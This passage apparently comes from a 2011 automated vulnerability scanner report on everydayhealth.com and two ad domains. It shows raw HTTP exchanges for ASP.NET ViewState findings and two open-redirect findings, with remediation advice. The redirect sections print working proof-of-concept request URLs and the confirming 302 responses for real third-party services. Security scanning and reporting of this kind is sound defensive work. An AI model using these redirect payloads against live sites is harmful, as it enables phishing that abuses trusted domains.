Y29tL2hlYWx0aHktbGl2aW5nLzAyMjUvZ2xvYmFsLXdhcm1pbmctbWF5LXBvc2UtZGVhdGgtcmlza3MuYXNweGQWAmYPFQEnR2xvYmFsICAgV2FybWluZyAgTWF5IFBvc2UgSGVhbHRoIFJpc2tzZAIBD2QWAgIBDw8WAh8FBVlodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9hbGxlcmdpZXMvc3BlY2lhbGlzdHMvaG93LWRvLWktdGVzdC1mb3ItZm9vZC1hbGxlcmdpZXMuYXNweGQWAmYPFQEjSG93IERvIEkgVGVzdCBGb3IgRm9vZCAgQWxsZXJnaWVzID9kAgIPZBYCAgEPDxYCHwUFQmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ2llcy9hbGxlcmd5LWJsb29kLXRlc3RpbmcuYXNweGQWAmYPFQEcQmxvb2QgVGVzdGluZyBGb3IgIEFsbGVyZ2llc2QCAg9kFgQCAQ8PFgIfAAUbTW9yZSBvbiBBbGxlcmd5IE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFMWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcXVpLWFsbGVyZ3lkFgJmDxUBDkxpcXVpLSBBbGxlcmd5ZAIBD2QWAgIBDw8WAh8FBTNodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9kYXlxdWlsLWFsbGVyZ3lkFgJmDxUBEERheXF1aWwgIEFsbGVyZ3lkAgIPZBYCAgEPDxYCHwUFNGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2JlbmFkcnlsLWFsbGVyZ3lkFgJmDxUBEUJlbmFkcnlsICBBbGxlcmd5ZAIDD2QWBAIBDw8WAh8ABRtBc2sgYSBQaGFybWFjaXN0OiBBbGxlcmdpZXNkZAIDDxYCHwQCAxYGZg9kFgICAQ8PFgIfBQV4aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoLXF1ZXN0aW9ucy9kaXVyZXRpY3Mvd2hpY2gtZGl1cmV0aWNzLWNhbi15b3UtdGFrZS1pZi15b3UtYXJlLWFsbGVyZ2ljLXRvLXN1bGZhLWRydWdzZBYCZg8VAUBXaGljaCBEaXVyZXRpY3MgQ2FuIFlvdSBUYWtlIElmIFlvdSBBcmUgQWxsZXJnaWMgVG8gU3VsZmEgRHJ1Z3M/ZAIBD2QWAgIBDw8WAh8FBWxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhZmZlaW5lL3doYXQtYXJlLXNvbWUtb2YtdGhlLWFsbGVyZ2ljLXN5bXB0b21zLWZyb20tY2FmZmVpbmVkFgJmDxUBNVdoYXQgQXJlIFNvbWUgT2YgVGhlIEFsbGVyZ2ljIFN5bXB0b21zIEZyb20gQ2FmZmVpbmU/ZAICD2QWAgIBDw8WAh8FBW9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2FzdGVwcm8vY2FuLWFzdGVwcm8td2VpZ2h0LWdhaW4tY2FuLXNpbmd1bGFpci1jYXVzZS13ZWlyZC1kcmVhbXNkFgJmDxUBOkNhbiBBc3RlcHJvIFdlaWdodCBHYWluPyBDYW4gU2luZ3VsYWlyIENhdXNlIFdlaXJkIERyZWFtcz9kAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

14.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJJcyBDaG9sZXN0ZXJvbCBUcmVhdG1lbnQgV29ydGggSXQ/IC0gRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1lZGljYXRpb25zLCBkaWV0LCBleGVyY2lzZSwgb3IgYWxsIHRocmVlIGNhbiB1c3VhbGx5IG1hbmFnZSBjaG9sZXN0ZXJvbC4gU28gaWYgZGlldCBhbmQgZXhlcmNpc2UgY2FuIGxvd2VyIGhpZ2ggY2hvbGVzdGVyb2wsIGlzIG1lZGljYXRpb24gbmVjZXNzYXJ5PyIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYXJ0LWRpc2Vhc2UvY2hvbGVzdGVyb2wvZHJ1Zy10cmVhdG1lbnRzLWZvci1oaWdoLWNob2xlc3Rlcm9sLmFzcHgiIC8+DQoNCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb25uZWN0LmZhY2Vib29rLm5ldC9lbl9VUy9hbGwuanMjeGZibWw9MSI+PC9zY3JpcHQ+ZAIDD2QWAgIBD2QWAgICD2QWCGYPZBYEZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDw8WBB4IQ3NzQ2xhc3MFCnZlcnRpY2FsYWQeBF8hU0ICAmRkAgIPZBYCAgEPZBYEAgEPDxYCHwAFDk5leHQgQXJ0aWNsZTogZGQCAw8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBU5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oaWdoLWNob2xlc3Rlcm9sL2hpZ2gtY2hvbGVzdGVyb2wtdHJlYXRtZW50LmFzcHhkFgJmDxUBHkhpZ2ggICBDaG9sZXN0ZXJvbCAgIFRyZWF0bWVudGQCAw9kFgYCAg9kFgQCAQ8PFgIfAAUkUmVsYXRlZCBBcnRpY2xlcyBvbiBIaWdoIENob2xlc3Rlcm9sZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFTmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hpZ2gtY2hvbGVzdGVyb2wvaGlnaC1jaG9sZXN0ZXJvbC10cmVhdG1lbnQuYXNweGQWAmYPFQEeSGlnaCAgIENob2xlc3Rlcm9sICAgVHJlYXRtZW50ZAIBD2QWAgIBDw8WAh8FBVpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFydC1kaXNlYXNlL2Nob2xlc3Rlcm9sL3Rha2luZy1hbi1pbmRpdmlkdWFsLWFwcHJvYWNoLmFzcHhkFgJmDxUBN1doeSAgQ2hvbGVzdGVyb2wgICBUcmVhdG1lbnQgIElzIERpZmZlcmVudCBGb3IgRXZlcnlvbmVkAgIPZBYCAgEPDxYCHwUFV2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1jZW50ZXIvaGlnaC1jaG9sZXN0ZXJvbC1zaG91bGQtaS10YWtlLXN0YXRpbnMuYXNweGQWAmYPFQEtSGlnaCAgIENob2xlc3Rlcm9sIDogU2hvdWxkIEkgVGFrZSAgU3RhdGlucyA/ZAIDD2QWBAIBDw8WAh8ABR9Nb3JlIG9uIENob2xlc3Rlcm9sIE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFK2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcGl0b3JkFgJmDxUBB0xpcGl0b3JkAgEPZBYCAgEPDxYCHwUFKWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL3pldGlhZBYCZg8VAQVaZXRpYWQCAg9kFgICAQ8PFgIfBQU2aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vZHJ1Z3MvY29lbnp5bWUtcTEwLWNvcTEwZBYCZg8VARRDb2VuenltZSBRMTAgKENvcTEwKWQCBA9kFgQCAQ8PFgIfAAUiQXNrIGEgUGhhcm1hY2lzdDogSGlnaCBDaG9sZXN0ZXJvbGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBX9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL25pZ2h0bWFyZXMvaS1oYXZlLXRha2VuLWxpcGl0b3ItYXRlbm9sb2wtc3RhdGlucy1hbmQtcHJvemFjLWZvci15ZWFycy1hcy13ZWxsLWFzZBYCZg8VAWFJIEhhdmUgVGFrZW4gTGlwaXRvciwgQXRlbm9sb2wsICBTdGF0aW5zICwgQW5kIFByb3phYyBGb3IgWWVhcnMsIEFzIFdlbGwgQXMgVml0YW1pbiBEIEFuZCBDYWxjaXVtZAIBD2QWAgIBDw8WAh8FBW5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhcmRpemVtL2lzLWNhcmRpemVtLXRoZS1iZXN0LW1lZGljYXRvbi1mb3ItYXRyaWFsLWZpYnJpbGxhdGlvbmQWAmYPFQE3SXMgQ2FyZGl6ZW0gVGhlIEJlc3QgTWVkaWNhdG9uIEZvciBBdHJpYWwgRmlicmlsbGF0aW9uP2QCAg9kFgICAQ8PFgIfBQWBAWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1xdWVzdGlvbnMvc3RvbWFjaC11cHNldC93aGljaC1vZi10aGVzZS1tZWRpY2F0aW9ucy1pcy1jYXVzaW5nLW15LXN0b21hY2gtcHJvYmxlbXMtbGlzaW5vcHJpbGQWAmYPFQFqV2hpY2ggT2YgVGhlc2UgTWVkaWNhdGlvbnMgSXMgQ2F1c2luZyBNeSBTdG9tYWNoIFByb2JsZW1zLCBMaXNpbm9wcmlsLCBNZXRmb3JtaW4sIFByYXZhc3RhdGluLCBPciBBc3BpcmluP2QCBw9kFgICAQ9kFgICAg8PFgIfAWhkZGQ=" />
...[SNIP]...

14.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGCA0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJUVnMgQ29tbW9uIGluIERheWNhcmUgQ2VudGVycyBEZXNwaXRlIEd1aWRlbGluZXMgLSBLaWRzJyBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1vcmUgdGhhbiB0d28tdGhpcmRzIG9mIGRheWNhcmUgY2VudGVycyBpbmNsdWRlZCBpbiBhIG5ldyBVLlMuIHN0dWR5IGhhdmUgVFZzIGF2YWlsYWJsZSBmb3IgY2hpbGRyZW4gdG8gd2F0Y2gsIGFuZCBuZWFybHkgNjAgcGVyY2VudCBvZiB0aGUgY2VudGVycyBpZ25vcmVkIHRoZSBBbWVyaWNhbiBBY2FkZW15IG9mIFBlZGlhdHJpY3MnIGd1aWRlbGluZXMgZm9yIHRlbGV2aXNpb24gZXhwb3N1cmUgaW4geW91bmcga2lkcy4iID4NCjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJhcnRpY2xlIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vaW1hZ2VzLmFnb3JhbWVkaWEuY29tL2V2ZXJ5ZGF5aGVhbHRoL2djbXMvbG9nb19laF81MHg1MC5naWYiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6c2l0ZV9uYW1lIiBjb250ZW50PSJFdmVyeWRheUhlYWx0aC5jb20iLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphcHBfaWQiIGNvbnRlbnQ9IjEzNTM0NjAzNjQ5MDE4NiIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFkbWlucyIgY29udGVudD0iIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgcnVuYXQ9InNlcnZlciIgaWQ9ImZidXJsIiBjb250ZW50PSJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9raWRzLWhlYWx0aC8wNTA0L3R2cy1jb21tb24taW4tZGF5Y2FyZS1jZW50ZXJzLWZsb3V0aW5nLWd1aWRlbGluZXMuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgMPZBYCAgEPZBYEAgEPDxYCHwAFIFJlbGF0ZWQgQXJ0aWNsZXMgb24gS2lkcycgSGVhbHRoZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgEPZBYCAgEPDxYCHwUFS2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3NsZWVwLXNvbHV0aW9ucy1mb3ItdG9kZGxlcnMuYXNweGQWAmYPFQEdU2xlZXAgU29sdXRpb25zIEZvciAgVG9kZGxlcnNkAgIPZBYCAgEPDxYCHwUFRGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLXBpY2t5LWVhdGVycy5hc3B4ZBYCZg8VAShIb3cgVG8gR2V0IFBpY2t5IEVhdGVycyBUbyBUcnkgTmV3IEZvb2RzZAIHD2QWBAIBD2QWAgICDw8WAh8BaGRkAgUPFgIfAWdkZA==" />
...[SNIP]...

14.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAXHBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSIzIFdheXMgdG8gUHV0IHRoZSBXb3chIEJhY2sgaW4gWW91ciBTZXggTGlmZSAtIFNleHVhbCBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlRoZXJlIGFyZSBtYW55IHRyZWF0bWVudCBvcHRpb25zIGF2YWlsYWJsZSB0byBoZWxwIHNleHVhbCBhcm91c2FsIGRpc29yZGVyLiBMZWFybiBhYm91dCBzZXggdGhlcmFweSwgaG9ybW9uZSB0aGVyYXB5LCBhbmQgb3RoZXIgYW5zd2VycyBmb3IgdGhpcyBzZXggZGlzb3JkZXIuIiA+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dHlwZSIgY29udGVudD0iYXJ0aWNsZSIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cDovL2ltYWdlcy5hZ29yYW1lZGlhLmNvbS9ldmVyeWRheWhlYWx0aC9nY21zL2xvZ29fZWhfNTB4NTAuZ2lmIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YXBwX2lkIiBjb250ZW50PSIxMzUzNDYwMzY0OTAxODYiLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphZG1pbnMiIGNvbnRlbnQ9IiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIHJ1bmF0PSJzZXJ2ZXIiIGlkPSJmYnVybCIgY29udGVudD0iaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vc2V4dWFsLWhlYWx0aC9zZXh1YWwtZHlzZnVuY3Rpb24vYWRkaXRpb25hbC10cmVhdG1lbnRzLWZvci1mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFYmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvc2V4dWFsLWR5c2Z1bmN0aW9uL2ZlbWFsZS1zZXh1YWwtYXJvdXNhbC1kaXNvcmRlci5hc3B4ZBYCZg8VATNUaGUgRmFjdHMgQWJvdXQgRmVtYWxlICBTZXh1YWwgICBBcm91c2FsICAgRGlzb3JkZXJkAgMPZBYGAgEPZBYEAgEPDxYCHwAFIVJlbGF0ZWQgQXJ0aWNsZXMgb24gU2V4dWFsIEhlYWx0aGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBWJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3NleHVhbC1keXNmdW5jdGlvbi9mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweGQWAmYPFQEzVGhlIEZhY3RzIEFib3V0IEZlbWFsZSAgU2V4dWFsICAgQXJvdXNhbCAgIERpc29yZGVyZAIBD2QWAgIBDw8WAh8FBUFodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3ZpYWdyYS1mb3Itd29tZW4uYXNweGQWAmYPFQERVmlhZ3JhIEZvciBXb21lbj9kAgIPZBYCAgEPDxYCHwUFUmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvaHlwb2FjdGl2ZS1zZXh1YWwtZGVzaXJlLWRpc29yZGVyLmFzcHhkFgJmDxUBKldoYXQgSXMgSHlwb2FjdGl2ZSBTZXh1YWwgRGVzaXJlIERpc29yZGVyP2QCAg9kFgQCAQ8PFgIfAAUTTW9yZSBvbiBNZWRpY2F0aW9uc2RkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBSxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9rbG9ub3BpbmQWAmYPFQEIS2xvbm9waW5kAgEPZBYCAgEPDxYCHwUFKmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2FtYmllbmQWAmYPFQEGQW1iaWVuZAICD2QWAgIBDw8WAh8FBSpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy96b2xvZnRkFgJmDxUBBlpvbG9mdGQCAw8PFgIfAWhkFgQCAQ8PFgIfAAUfQXNrIGEgUGhhcm1hY2lzdDogU2V4dWFsIEhlYWx0aGRkAgMPFgIfBGZkAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

15. Open redirection previous next
There are 2 instances of this issue:

http://b.scorecardresearch.com/r [d.c parameter]
http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

15.1. http://b.scorecardresearch.com/r [d.c parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a931d9ba52d92a20e/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

http://a931d9ba52d92a20e/a?gif

Request

GET /r?c2=6035805&d.c=http%3a//a931d9ba52d92a20e/a%3fgif&d.o=spnprod&d.x=52797902&d.t=page&d.u=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec1_lnk3%257C60545 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a931d9ba52d92a20e/a?gif
Date: Thu, 05 May 2011 01:10:31 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 04-May-2013 01:10:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.2. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a2f90a939365257d7/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://a2f90a939365257d7/a?1=1

Request

GET /getuid?http%3a//a2f90a939365257d7/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
